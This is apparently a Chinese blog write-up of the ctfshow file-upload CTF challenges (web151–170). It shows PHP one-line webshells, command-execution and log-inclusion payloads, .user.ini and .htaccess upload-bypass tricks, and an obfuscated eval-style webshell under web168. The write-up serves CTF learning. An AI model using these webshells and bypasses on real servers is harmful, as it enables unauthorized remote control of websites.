ctfshow文件上传系列

已于 2023-07-11 21:12:42 修改
阅读量302 收藏
点赞数
文章标签: python
于 2023-07-08 11:12:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_73500273/article/details/131609582
版权
文章描述了一系列Web安全挑战,涉及到利用不同的方法绕过文件上传限制,包括更改文件后缀、构造特殊payload、利用配置文件(.user.ini,.htaccess)以及利用Apache漏洞。这些技巧用于执行命令、翻目录和获取flag。还提到了一些特定的编码和解码方法来避免关键字过滤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

web151:

这个要洗一个一句话木马

payloadl:

<?php @eval($_POST["cmd"]);

先把文件名后缀改为png,,然后是上传

用bp抓包,改后缀名为php发送之后会显示上传成功,后面会有他的上传路径

用哥斯拉进行连接,然后翻目录就能父目录找到flag

web152:

和上一题一样,突然想起来还有其他做法。类似于做命令执行的时候的环境。没有环境我们自己,自己传一个上去用这个文件做梯子

web153:

这题要把环境修改,也就是上传一个配置文件让他生效

看来大佬的wp,上传的配置文件是.user.ini.网上查了一下这个配置文件的作用

相当于在user.ini里面配置了之后不管是那个php文件让都要包含user.ini里设置的文件代码

比如:

我在.user.ini里面这么设置

 那么与这个配置文件所在的目录下的所有php文件前面都要包含这个1.png的文本

文字1.png里面又写一个:

那么我上传成功后直接连接 index.php就能直接链接到木马了,翻目录查看flag

web154:

这题发现用上一题的做法是,上传一句话木马的时候被禁用了,去大佬的wp发现他把php进行禁用了,但是PHP中对于php大小写是不区分的,所以把php变为pHP就行了

web155:

这题是把php严格过滤了,使用段短标签进行绕过

web156:

[]被过滤,用{}可以代替

web157:

这题;被过滤了,木马暂时想不到办法上传,我传个命令文件让给他给我执行

payload:

<?php system("ls");

web158:

()被过滤了,这次是抄大佬的wp

payload:

<?=`tac ../fl*`?>

 没想明白是怎么回事

web160:

这题要用日志包含,他把空格过滤了,可以使用.进行续接

日志包含的payload:

<?php include"/var/lo"."g/nginx/access.lo"."g"  ?>

.user.ini正常上传

被包含的文件包含上面的payload

然后访问up目录就能看到日志

然后之后包含就是在ua里面进行木马包含。

木马payload:
 

<?php @eval($_POST["cmd"]);?>

蚁剑直接连接up目录就能反目录了

web161:

和上一题一样的写法,但是要在这里加一个文件头

 后面和上一题一样的做法,就是加了个文件头

web167:

前面几题不会做先跳了后面再做

这题要用到一个Apache的漏洞而且前面的都是上传png图片这题上传的是jpg图片

那么就和前面的.user.ini一样的,自己造一个轮子。传.htaccess文件上去,然后传一个文件上去往里添加木马文件,然后用蚁剑连接这个文件,就能翻目录了。

web168:

不知道怎么个免杀法,一句话传上去被杀掉了。我是先上文件命令执行看到flag,再传木马看我前面传的木马文件,发现都找不到

命令执行payload:

<?php $a='syste'.'m';($a)('ls ../');

 木马的payload:

<?php // 使用时请删除此行, 连接密码: TyKPuntU ?>
<?php $bFIY=create_function(chr(25380/705).chr(92115/801).base64_decode('bw==').base64_decode('bQ==').base64_decode('ZQ=='),chr(0x16964/0x394).chr(0x6f16/0xf1).base64_decode('YQ==').base64_decode('bA==').chr(060340/01154).chr(01041-0775).base64_decode('cw==').str_rot13('b').chr(01504-01327).base64_decode('ZQ==').chr(057176/01116).chr(0xe3b4/0x3dc));$bFIY(base64_decode('NjgxO'.'Tc7QG'.'V2QWw'.'oJF9Q'.''.str_rot13('G').str_rot13('1').str_rot13('A').base64_decode('VQ==').str_rot13('J').''.''.chr(0x304-0x2d3).base64_decode('Ug==').chr(13197/249).str_rot13('F').base64_decode('MQ==').''.'B1bnR'.'VXSk7'.'MjA0N'.'TkxOw'.'=='.''));?>

web169:

这题上传的文件有点离谱,还是看了大佬的wp才看到的是zip文件。还得把格式改为image/png才能上传成功,但是这题把<过滤了就有点难搞。但是想一下发现这题用日志包含也能做。.user.ini包含日志,然后日志ua上传木马,在自己传一个php文件上去,蚁剑连接这个文件就有了

web170:

不知道为什么一直传不上去,

ctfshow文件上传
weixin_53955759的博客
04-15 869
web151 前台校验不可靠,前端验证 上传png,抓包改文件名为.php 成功,蚁剑连接得到falg web152 更改Content-Type即可 蚁剑连接,得到flag web153 利用上传user.ini进行文件上传绕过。 自 PHP 5.3.0 起,PHP 支持基于每个目录的 INI 文件配置。此类文件 仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果你的 PHP 以模块化运行在 Apache 里,则用 .htaccess 文件有同样
CTFshow web入门——文件上传
热门推荐
小元砸的博客
03-14 1万+
Web 151
CTFShow-WEB入门篇文件上传详细Wp(151-170)
Aluxian_的博客
07-16 2812
【代码】CTFShow-WEB入门篇文件上传详细Wp(115-170)
CTFshow-文件上传
qq_61376069的博客
01-22 630
CTFshow入门——文件上传
CTFSHOW-文件上传
Monica的博客
10-03 4021
环境要求: allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据 allow_url_include=On(php5.2之后默认为Off) 规定是否允许include/require远程文件 WEB78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 分析:
ctfshow 文件上传
qq_52671379的博客
04-06 445
ctfshow 文件上传
ctfshow php特性系列
xiaolong22333的博客
04-18 4996
文章目录web89web90web91web92web93web94web95web96web97web98 web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)
ctfshow-web入门系列-命令执行-web29-web36
m0_74416116的博客
09-27 2115
ctfshow 命令执行入门学习
CTFSHOW WEB题目
qq_45655564的博客
08-09 3129
web签到题 网页原代码中发现这个,base64解码就是flag web2 这道题目就是最简单的SQL注入了 发现万能密码可以成功。 于是后台查询语句猜测是select ‘column’ from ‘table’ where username=’$_POST[]’&password=’$_POST[]’ limit 1,1 自己猜的熬,不一定是完全正确的。 这样的话直接闭合前面的单引号就行了。 之后就是 123’ or 1=1 union select 1,2,3# 123’ or 1=1 un
ctfshow 内网渗透
最新发布
04-01
另外值得注意的是,《文件上传》这一章节也提到了若干种绕过防护机制的方法论,虽然主要聚焦于特定类型的漏洞挖掘上,但对于整体思维模式构建同样具有启发意义[^4]。 最后提醒一点就是无论何时何地都要严格遵守法律...
CTFshow | 文件上传
m0_60651303的博客
08-04 899
var/log/nginx/ 目录是 NGINX 的默认日志位置,可以从中找到一个 access.log 文件和 error.log 文件,include函数包含日志查看日志内容。2、看一下upload文件下有index.php,说明可以通过.user.ini文件来上传。文件上传漏洞是指用户上传了一个可执行的脚本文件,而且通过这个脚本文件获得了执行服务端命令的能力。1、几经尝试,发现php不能通过,phP可以通过,说明过滤掉了php。过滤了php,system,{},和分号,直接执行命令。
ctfshow——文件上传
qq_55202378的博客
12-27 1740
之外,php还会在每个目录下扫描INI文件,从被执行的PHP文件所在目录开始一直上升到web根目录($_SERVER[‘DOCUMENT_ROOT’]所指定)。的组件库,url代表上传接口,accept代表允许上传的文件类型,exts代表允许上传的文件后缀。风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 和PHP_INI_ALL模式的 INI 设置可被识别。,上传一个png的webshell,再使用burp抓包更改文件后缀名,再访问上传的webshell。
ctfshow-文件上传
jdk12123的博客
10-24 273
发现只能传图片,无所谓那就把一句话木马改成.png然后抓包在改回.php然后蚁剑直接连接获取flag。直接传png都不行了,怎么办?发现是图片马被过滤,因为正常的图片是可以上传的。然后查看发现index.php可以访问,接着上一题的办法既可以完成题目。那基本就是有黑名单过滤,直接尝试.user.ini绕过。依然可以采用 .user.ini绕过。与web 151 一样。
CTFShow文件上传
paidx0
08-07 489
CTFShow文件上传 web151 前端直接抓包改就行 web152 同上 web153 利用上传.user.ini进行文件上传绕过 php.ini是php的一个全局配置文件,对整个web服务起作用; 而.user.ini和.htaccess一样是目录的配置文件,.user.ini就是用户自定义的一个php.ini, 通常用这个文件来构造后门和隐藏后门。 **利用.user.ini,要求目标目录下必须包含php文件** .user.ini的内容为auto_append_file=1.png,意思就是使1
CTFSHOW 文件上传
m0_64180167的博客
11-14 427
直接上传 png的图片马然后抓包修改为php。
CTFSHOW 文件上传
qq_51754713的博客
02-27 439
开启文件上传 先补充一些知识 1.一句话木马 <?php @eval($_POST['attack']) ?> 只要一句话脚本上传到了服务器当中,我们就可以使用中国蚁剑或者中国菜刀链接并控制整个服务器。 2.中国蚁剑的使用 此处添加的url为我们一句话脚本所在的url,连接密码就是我们定义的_POST中的变量,如上面就是attack。 web152 解题思路:上传我们做好的含有一句话木马的图片,然后抓包修改发送包的类型为php,用蚁剑连接。 知识点: ①一句话木马的制作:我们使用Notepa
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

九月一。

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值